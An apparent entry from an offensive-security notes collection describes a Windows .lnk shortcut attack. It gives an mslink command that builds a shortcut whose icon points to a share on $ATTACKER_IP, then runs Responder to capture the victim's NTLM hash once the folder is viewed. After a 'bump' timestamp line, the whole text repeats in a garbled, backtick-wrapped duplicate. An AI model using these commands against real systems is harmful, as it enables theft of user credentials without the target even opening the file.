killchain-compendium/exploit/windows/docs/lnk_exploit.md

# .lnk exploit

* [Trendmicro's article](https://www.trendmicro.com/en_us/research/17/e/rising-trend-attackers-using-lnk-files-download-malware.html)
* [mamachine's tool](http://mamachine.org/mslink/index.en.html)

* Target does not even have to open the link directly

```sh 
mslink_v1.3.sh -l notimportant -n shortcut -i \\\\$ATTACKER_IP\\yo -o shortcut.lnk
```
* Start a responder and wait for user's hash
```sh
responder -I eth0
```
bump 2022-03-10 01:31:54 +01:00			`# .lnk exploit`

			`* [Trendmicro's article](https://www.trendmicro.com/en_us/research/17/e/rising-trend-attackers-using-lnk-files-download-malware.html)`
			`* [mamachine's tool](http://mamachine.org/mslink/index.en.html)`

			`* Target does not even have to open the link directly`

			```sh
			`mslink_v1.3.sh -l notimportant -n shortcut -i \\\\$ATTACKER_IP\\yo -o shortcut.lnk`
			```
			`* Start a responder and wait for user's hash`
			```sh
			`responder -I eth0`
			```